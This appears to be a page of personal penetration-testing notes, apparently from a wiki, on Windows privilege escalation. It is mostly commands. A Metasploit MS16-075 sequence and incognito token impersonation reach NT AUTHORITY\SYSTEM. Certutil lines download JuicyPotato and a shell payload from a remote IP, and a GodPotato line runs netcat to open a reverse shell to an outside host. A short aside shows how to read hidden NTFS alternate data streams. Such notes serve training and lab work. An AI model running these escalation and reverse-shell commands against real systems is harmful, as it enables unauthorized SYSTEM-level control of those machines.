Impersonation and Potato Attacks

Token Impersonation Overview

Token impersonation explained

Windows - Privilege Escalation - Internal All The Thingsswisskyrepo.github.io

Potato Attack Overview

Escalation via Potato Attack

After getting a meterpreter shell

background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738        <-- Something different from the first shell
exploit

Inside of new meterpreter shell

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami

Manual Juicy Potato Attack

cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"

GOD POTATO

godpotato.exe -cmd "cmd /c whoami"

.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"

Resources

https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exegithub.com

JuicyPotato - HackTricksbook.hacktricks.xyz

Bonus

Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

dir /r
more hm.txt:root.txt:$DATA

Introduction to Alternate Data Streams | Malwarebytes LabsMalwarebytes

PreviousDLL Hijacking NextRegisty

hashtagToken Impersonation Overview

hashtagPotato Attack Overview

hashtagEscalation via Potato Attack

hashtagManual Juicy Potato Attack

hashtagGOD POTATO

hashtagResources

hashtagBonus

hashtagAlternate Data Streams